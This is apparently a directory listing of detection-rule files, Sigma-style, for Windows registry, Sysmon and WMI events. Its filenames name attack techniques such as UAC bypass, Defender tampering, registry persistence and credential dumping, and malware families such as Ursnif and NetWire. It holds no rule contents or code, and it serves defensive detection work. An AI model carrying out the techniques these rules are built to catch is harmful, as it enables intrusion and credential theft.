registry_event_asep_reg_keys_modification_currentversion_nt.yml
registry_event_asep_reg_keys_modification_internet_explorer.yml
registry_event_asep_reg_keys_modification_office.yml
registry_event_asep_reg_keys_modification_session_manager.yml
registry_event_asep_reg_keys_modification_system_scripts.yml
registry_event_asep_reg_keys_modification_winsock2.yml
registry_event_asep_reg_keys_modification_wow6432node.yml
registry_event_asep_reg_keys_modification_wow6432node_classes.yml
registry_event_asep_reg_keys_modification_wow6432node_currentversion.yml
registry_event_blackbyte_ransomware.yml
registry_event_bypass_uac_using_delegateexecute.yml
registry_event_bypass_uac_using_eventviewer.yml
registry_event_bypass_uac_using_silentcleanup_task.yml
registry_event_bypass_via_wsreset.yml
registry_event_change_rdp_port.yml
registry_event_change_security_zones.yml
registry_event_chrome_extension.yml
registry_event_cmstp_execution_by_registry.yml
registry_event_cobaltstrike_service_installs.yml
registry_event_comhijack_sdclt.yml
registry_event_crashdump_disabled.yml
registry_event_cve_2020_1048.yml
registry_event_cve_2021_31979_cve_2021_33771_exploits.yml
registry_event_defender_disabled.yml
registry_event_defender_exclusions.yml
registry_event_defender_realtime_protection_disabled.yml
registry_event_dhcp_calloutdll.yml
registry_event_disable_administrative_share.yml
registry_event_disable_defender_firewall.yml
registry_event_disable_microsoft_office_security_features.yml
registry_event_disable_security_events_logging_adding_reg_key_minint.yml
registry_event_disable_uac_registry.yml
registry_event_disable_wdigest_credential_guard.yml
registry_event_disabled_exploit_guard_net_protection_on_ms_defender.yml
registry_event_disabled_pua_protection_on_microsoft_defender.yml
registry_event_disabled_tamper_protection_on_microsoft_defender.yml
registry_event_dns_over_https_enabled.yml
registry_event_dns_serverlevelplugindll.yml
registry_event_enabling_cor_profiler_env_variables.yml
registry_event_esentutl_volume_shadow_copy_service_keys.yml
registry_event_etw_disabled.yml
registry_event_file_association_exefile.yml
registry_event_hack_wce_reg.yml
registry_event_hidden_extention.yml
registry_event_hybridconnectionmgr_svc_installation.yml
registry_event_ie_persistence.yml
registry_event_logon_scripts_userinitmprlogonscript_reg.yml
registry_event_mal_adwind.yml
registry_event_mal_azorult.yml
registry_event_mal_blue_mockingbird.yml
registry_event_mal_flowcloud.yml
registry_event_mal_netwire.yml
registry_event_mal_ursnif.yml
registry_event_mimikatz_printernightmare.yml
registry_event_modify_screensaver_binary_path.yml
registry_event_mstsc_history_cleared.yml
registry_event_narrator_feedback_persistance.yml
registry_event_net_ntlm_downgrade.yml
registry_event_new_application_appcompat.yml
registry_event_new_dll_added_to_appcertdlls_registry_key.yml
registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
registry_event_office_enable_dde.yml
registry_event_office_security.yml
registry_event_office_test_regadd.yml
registry_event_office_vsto_persistence.yml
registry_event_outlook_c2_registry_key.yml
registry_event_outlook_registry_todaypage.yml
registry_event_outlook_registry_webview.yml
registry_event_outlook_security.yml
registry_event_persistence.yml
registry_event_persistence_key_linking.yml
registry_event_persistence_recycle_bin.yml
registry_event_persistence_search_order.yml
registry_event_portproxy_registry_key.yml
registry_event_powershell_as_service.yml
registry_event_rdp_registry_modification.yml
registry_event_rdp_settings_hijack.yml
registry_event_redmimicry_winnti_reg.yml
registry_event_removal_amsi_registry_key.yml
registry_event_removal_com_hijacking_registry_key.yml
registry_event_runkey_winekey.yml
registry_event_runonce_persistence.yml
registry_event_set_servicedll.yml
registry_event_shell_open_keys_manipulation.yml
registry_event_shim_databases_persistence.yml
registry_event_silentprocessexit.yml
registry_event_silentprocessexit_lsass.yml
registry_event_ssp_added_lsa_config.yml
registry_event_stickykey_like_backdoor.yml
registry_event_susp_atbroker_change.yml
registry_event_susp_download_run_key.yml
registry_event_susp_lsass_dll_load.yml
registry_event_susp_mic_cam_access.yml
registry_event_susp_printer_driver.yml
registry_event_susp_reg_persist_explorer_run.yml
registry_event_susp_run_key_img_folder.yml
registry_event_susp_service_installed.yml
registry_event_suspicious_keyboard_layout_load.yml
registry_event_sysinternals_eula_accepted.yml
registry_event_sysinternals_sdelete_registry_keys.yml
registry_event_taskcache_entry.yml
registry_event_telemetry_persistence.yml
registry_event_trust_record_modification.yml
registry_event_uac_bypass_eventvwr.yml
registry_event_uac_bypass_sdclt.yml
registry_event_uac_bypass_winsat.yml
registry_event_uac_bypass_wmp.yml
registry_event_vbs_payload_stored.yml
registry_event_wab_dllpath_reg_change.yml
registry_event_wdigest_enable_uselogoncredential.yml
registry_event_winlogon_notify_key.yml

sysmon

sysmon_accessing_winapi_in_powershell_credentials_dumping.yml
sysmon_config_modification.yml
sysmon_config_modification_error.yml
sysmon_config_modification_status.yml
sysmon_dcom_iertutil_dll_hijack.yml
sysmon_process_hollowing.yml

wmi_event

sysmon_wmi_event_subscription.yml
sysmon_wmi_susp_encoded_scripts.yml
sysmon_wmi_susp_scripting.yml